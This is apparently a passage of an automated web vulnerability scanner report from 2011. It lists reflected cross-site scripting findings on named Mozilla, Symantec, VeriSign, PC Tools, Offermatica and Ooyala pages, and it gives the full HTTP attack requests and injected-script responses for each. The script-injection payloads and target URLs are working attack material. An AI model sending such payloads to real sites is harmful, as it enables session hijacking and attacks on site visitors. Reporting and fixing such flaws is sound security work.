3.7. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://donate.mozilla.org
Path:	/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 809c8<script>alert(1)</script>eb7bb1b1504 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded809c8<script>alert(1)</script>eb7bb1b1504/contribute/openwebfund HTTP/1.1
Host: donate.mozilla.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751

Response

HTTP/1.0 404 Not Found
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Date: Fri, 09 Sep 2011 22:14:58 GMT
Connection: Keep-Alive
Set-Cookie: X-CheckNode=; domain=donate.mozilla.org; path=/
Content-Length: 391

<html>
<head>
<title>Error 404</title>
</head>
<body>
<h1>Sorry, File Not Found: 404</h1>
<p>Invalid URL /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded809c8<script>alert(1)</script>eb7bb1b1504/contribute/openwebfund</p>
...[SNIP]...

3.8. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://donate.mozilla.org
Path:	/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 91fb8<script>alert(1)</script>7f56fd6704d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute91fb8<script>alert(1)</script>7f56fd6704d/openwebfund HTTP/1.1
Host: donate.mozilla.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751

Response

HTTP/1.0 404 Not Found
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Date: Fri, 09 Sep 2011 22:14:59 GMT
Connection: Keep-Alive
Set-Cookie: X-CheckNode=; domain=donate.mozilla.org; path=/
Content-Length: 391

<html>
<head>
<title>Error 404</title>
</head>
<body>
<h1>Sorry, File Not Found: 404</h1>
<p>Invalid URL /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute91fb8<script>alert(1)</script>7f56fd6704d/openwebfund</p>
...[SNIP]...

3.9. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://donate.mozilla.org
Path:	/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 63933<script>alert(1)</script>bf1b7d05258 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund63933<script>alert(1)</script>bf1b7d05258 HTTP/1.1
Host: donate.mozilla.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751

Response

HTTP/1.0 404 Not Found
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Date: Fri, 09 Sep 2011 22:15:01 GMT
Connection: Keep-Alive
Set-Cookie: X-CheckNode=; domain=donate.mozilla.org; path=/
Content-Length: 391

<html>
<head>
<title>Error 404</title>
</head>
<body>
<h1>Sorry, File Not Found: 404</h1>
<p>Invalid URL /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund63933<script>alert(1)</script>bf1b7d05258</p>
...[SNIP]...

3.10. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://donate.mozilla.org
Path:	/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 48171<script>alert(1)</script>2ff872bc181 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund?48171<script>alert(1)</script>2ff872bc181=1 HTTP/1.1
Host: donate.mozilla.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751

Response

HTTP/1.0 404 Not Found
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Date: Fri, 09 Sep 2011 22:14:56 GMT
Connection: Keep-Alive
Set-Cookie: X-CheckNode=; domain=donate.mozilla.org; path=/
Content-Length: 394

<html>
<head>
<title>Error 404</title>
</head>
<body>
<h1>Sorry, File Not Found: 404</h1>
<p>Invalid URL /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund?48171<script>alert(1)</script>2ff872bc181=1</p>
...[SNIP]...

3.11. https://fileconnect.symantec.com/licenselogin.jsp [localeStr parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://fileconnect.symantec.com
Path:	/licenselogin.jsp

Issue detail

The value of the localeStr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba9ab"%3b528b7643cdb was submitted in the localeStr parameter. This input was echoed as ba9ab";528b7643cdb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /licenselogin.jsp?localeStr=en_USba9ab"%3b528b7643cdb HTTP/1.1
Host: fileconnect.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:41:59 GMT
Content-length: 9332
Content-type: text/html;charset=UTF-8
Pragma: no-cache
Content-Language: en-US
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store
Connection: close

<html>
<head>

<script language="JavaScript" src="javascript/common.js"></script>
<script language="JavaScript" src="javascript/calendar2.js"></script>
<
...[SNIP]...
and channel on the next lines. */

s.pageName    = "en/us: biz: FileConnect: Serial Number Input https://fileconnect.symantec.com/licenselogin.jsp?localeStr=en_US";    // set page name

s.prop2        = "USba9ab";528b7643cdb"    // set country
s.eVar27    = "USba9ab";528b7643cdb"

s.prop3        = "en"    // set language
s.eVar28    = "en"

s.prop27    = "Business";    // set Visitor Segment
s.eVar50    = "Business";
s.prop41    = "FileConne
...[SNIP]...

3.12. https://forms.verisign.com/websurveys/servlet/ActionMultiplexer [Action_ID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://forms.verisign.com
Path:	/websurveys/servlet/ActionMultiplexer

Issue detail

The value of the Action_ID request parameter is copied into the HTML document as plain text between tags. The payload 63579<script>alert(1)</script>6e92133b729 was submitted in the Action_ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /websurveys/servlet/ActionMultiplexer?Action_ID=ACT200063579<script>alert(1)</script>6e92133b729&WSD_mode=3&WSD_surveyInfoID=943&toc=AAAAA-943-01-26&brand=01&country=26&oldToc=w29810323919638016&cid=47D9F8084F78B063 HTTP/1.1
Host: forms.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 80
Date: Fri, 09 Sep 2011 21:41:22 GMT

Missing or unknown action ID: ACT200063579<script>alert(1)</script>6e92133b729

3.13. http://free.pctools.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://free.pctools.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e810"><script>alert(1)</script>d4356c76675 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /favicon.ico5e810"><script>alert(1)</script>d4356c76675 HTTP/1.1
Host: free.pctools.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: reftrack=freesite%2320110909170147; PHPSESSID=68o0726o7nflfg28ire9iju5j2; __utma=9079138.240734855.1315623957.1315623957.1315623957.1; __utmb=9079138.1.10.1315623957; __utmc=9079138; __utmz=9079138.1315623957.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=1.1056361608.1315623957.1315623957.1315623957.1; __utmb=1.0.10.1315623957; __utmc=1; __utmz=1.1315623957.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.3.4
Content-Type: text/html; charset=UTF-8
Expires: Fri, 09 Sep 2011 22:05:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 09 Sep 2011 22:05:59 GMT
Content-Length: 8247
Connection: close
Vary: Accept-Encoding
Set-Cookie: reftrack=freesite%2320110909170147%7Cdeleted%2320110909170223; expires=Sat, 08-Sep-2012 21:02:24 GMT; path=/; domain=.pctools.com

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Get PC Tools AntiVi
...[SNIP]...
<form method="POST" style="margin: 0; padding: 10px 16px 0 0;" action="/favicon.ico5e810"><script>alert(1)</script>d4356c76675/">
...[SNIP]...

3.14. http://free.pctools.com/free-antivirus/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://free.pctools.com
Path:	/free-antivirus/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36661"><script>alert(1)</script>55a70ea0c85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /free-antivirus36661"><script>alert(1)</script>55a70ea0c85/ HTTP/1.1
Host: free.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.3.4
Content-Type: text/html; charset=UTF-8
Expires: Fri, 09 Sep 2011 21:42:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 09 Sep 2011 21:42:03 GMT
Content-Length: 8274
Connection: close
Set-Cookie: reftrack=freesite%2320110909163826; expires=Sat, 08-Sep-2012 20:38:28 GMT; path=/; domain=.pctools.com

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Get PC Tools AntiVi
...[SNIP]...
<form method="POST" style="margin: 0; padding: 10px 16px 0 0;" action="/free-antivirus36661"><script>alert(1)</script>55a70ea0c85/">
...[SNIP]...

3.15. http://free.pctools.com/free-antivirus/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://free.pctools.com
Path:	/free-antivirus/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fde3"><script>alert(1)</script>f1a4218a279 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /free-antivirus/?7fde3"><script>alert(1)</script>f1a4218a279=1 HTTP/1.1
Host: free.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.3.4
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 09 Sep 2011 21:42:02 GMT
Date: Fri, 09 Sep 2011 21:42:02 GMT
Content-Length: 17979
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Free AntiVirus & An
...[SNIP]...
<form method="POST" style="margin: 0; padding: 10px 16px 0 0;" action="/free-antivirus/?7fde3"><script>alert(1)</script>f1a4218a279=1">
...[SNIP]...

3.16. https://idprotect.verisign.com/toolbar/activate.v [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://idprotect.verisign.com
Path:	/toolbar/activate.v

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32d94'-alert(1)-'503da824579 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /toolbar/activate.v?32d94'-alert(1)-'503da824579=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: idprotect.verisign.com
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:47:52 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 7303
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
...[SNIP]...
<script type="text/javascript">
$(document).ready(function(){
$('#kaptchaRefresh').click(function(event) { $('#kaptchaImage').hide().attr('src', '/kaptcha.jpg?32d94'-alert(1)-'503da824579=1?' + Math.floor(Math.random()*100)).fadeIn(); });
$('#kaptchaImage').click(function (event) { $(this).hide().attr('src', '/kaptcha.jpg?32d94'-alert(1)-'503da824579=1?' + Math.floor(Math.random()
...[SNIP]...

3.17. https://idprotect.verisign.com/toolbar/activate.v [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://idprotect.verisign.com
Path:	/toolbar/activate.v

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3603"><script>alert(1)</script>2c6cb160cb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /toolbar/activate.v?b3603"><script>alert(1)</script>2c6cb160cb7=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: idprotect.verisign.com
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:47:50 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 7348
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
...[SNIP]...
<img id="kaptchaImage" src="/kaptcha.jpg?b3603"><script>alert(1)</script>2c6cb160cb7=1" alt="Click for a different one!" title="Click for a different one!" />
...[SNIP]...

3.18. https://idprotect.verisign.com/toolbar/download.v [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://idprotect.verisign.com
Path:	/toolbar/download.v

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa418"><script>alert(1)</script>feea2f12a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /toolbar/download.v?fa418"><script>alert(1)</script>feea2f12a5=1 HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/toolbar/home.v
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:47:52 GMT
Content-Type: text/html
Content-Length: 6622
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
...[SNIP]...
iv tabindex="0" style="cursor:pointer;padding-top:10px;" onkeydown="if ((event.which && event.which == 13) || (event.keyCode && event.keyCode == 13)) {location.href='/toolbar/install.v?fa418"><script>alert(1)</script>feea2f12a5=1'}" onclick="location.href='/toolbar/install.v?fa418">
...[SNIP]...

3.19. https://idprotect.verisign.com/toolbar/home.v [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://idprotect.verisign.com
Path:	/toolbar/home.v

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 141ab"><script>alert(1)</script>41143d22db1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /toolbar/home.v?141ab"><script>alert(1)</script>41143d22db1=1 HTTP/1.1
Host: idprotect.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:08 GMT
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
...[SNIP]...
<div tabindex="0" style="cursor:pointer;" onclick="location.href='/toolbar/download.v?141ab"><script>alert(1)</script>41143d22db1=1'" onkeydown="if ((event.which && event.which == 13) || (event.keyCode && event.keyCode == 13)) {location.href='/toolbar/download.v?141ab">
...[SNIP]...

3.20. https://idprotect.verisign.com/toolbar/install.v [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://idprotect.verisign.com
Path:	/toolbar/install.v

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e6ab"><script>alert(1)</script>b6843a60d67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /toolbar/install.v?2e6ab"><script>alert(1)</script>b6843a60d67=1 HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/toolbar/download.v
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:47:52 GMT
Content-Type: text/html
Content-Length: 6866
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
...[SNIP]...
<a id="download" href="/toolbar/downloadIE.v?2e6ab"><script>alert(1)</script>b6843a60d67=1">
...[SNIP]...

3.21. http://mbox3.offermatica.com/m2/verisign/mbox/standard [mbox parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mbox3.offermatica.com
Path:	/m2/verisign/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 9179f<script>alert(1)</script>b30639e2275 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621506825-922680&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_HP_AccBox_20119179f<script>alert(1)</script>b30639e2275&mboxId=0&mboxURL=http%3A//www.verisign.com/&mboxReferrer=&mboxVersion=31 HTTP/1.1
Host: mbox3.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1315621455064-973488.19

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315621455064-973488.19; Domain=offermatica.com; Expires=Sun, 09-Oct-2011 21:26:45 GMT; Path=/m2/verisign
Content-Type: text/javascript
Content-Length: 195
Date: Fri, 09 Sep 2011 21:26:45 GMT
Server: Test & Target

mboxFactoryDefault.get('VRSN_HP_AccBox_20119179f<script>alert(1)</script>b30639e2275',0).setOffer(new mboxOfferDefault()).loaded();mboxFactoryDefault.getPCId().forceId("1315621455064-973488.19");

3.22. http://player.ooyala.com/player.js [playerId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://player.ooyala.com
Path:	/player.js

Issue detail

The value of the playerId request parameter is copied into a JavaScript rest-of-line comment. The payload dbef4%0aalert(1)//8baddfff4b was submitted in the playerId parameter. This input was echoed as dbef4
alert(1)//8baddfff4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /player.js?callback=receiveOoyalaEvent&playerId=ooyalaPlayer_44h86_g6tvkk69dbef4%0aalert(1)//8baddfff4b&width=488&height=335&embedCode=5rbzB2MTrK9lAvHdEslUi3qJGrQInV_c&wmode=transparent HTTP/1.1
Host: player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/corporate/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 09 Sep 2011 21:26:29 GMT
Content-Type: text/javascript; charset=utf-8
X-Ooyala-Server-Id: i-17d1a37b
X-Pad: avoid browser bug
Content-Length: 26426
Cache-Control: private, max-age=300
Date: Fri, 09 Sep 2011 21:26:30 GMT
Connection: close
Vary: Accept-Encoding

(function(){var f="9.0.115";var K="6.0.65";window.OOYALA_PLAYER_JS={};var j=(navigator.appVersion.indexOf("MSIE")!==-1)?true:false;var R=(navigator.appVersion.toLowerCase().indexOf("win")!==-1)?true:f
...[SNIP]...
"class":"OoyalaVideoPlayer",data:T};},getEmbedParams:function(T,i){return{allowScriptAccess:"always",allowFullScreen:"true",bgcolor:"#000000",wmode:T,flashvars:i};}};A.init("ooyalaPlayer_44h86_g6tvkk69dbef4
alert(1)//8baddfff4b",a,d,"transparent","http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf","http",o,F,m,j,B);}else{var N=e.createContainerDiv(q+"_InstallFlash",a,d,B);N.innerHTML='<
...[SNIP]...

3.23. http://player.ooyala.com/player.js [wmode parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://player.ooyala.com
Path:	/player.js

Issue detail

The value of the wmode request parameter is copied into a JavaScript rest-of-line comment. The payload 61651%0aalert(1)//96a754f882a was submitted in the wmode parameter. This input was echoed as 61651
alert(1)//96a754f882a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /player.js?width=356&height=224&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent61651%0aalert(1)//96a754f882a HTTP/1.1
Host: player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
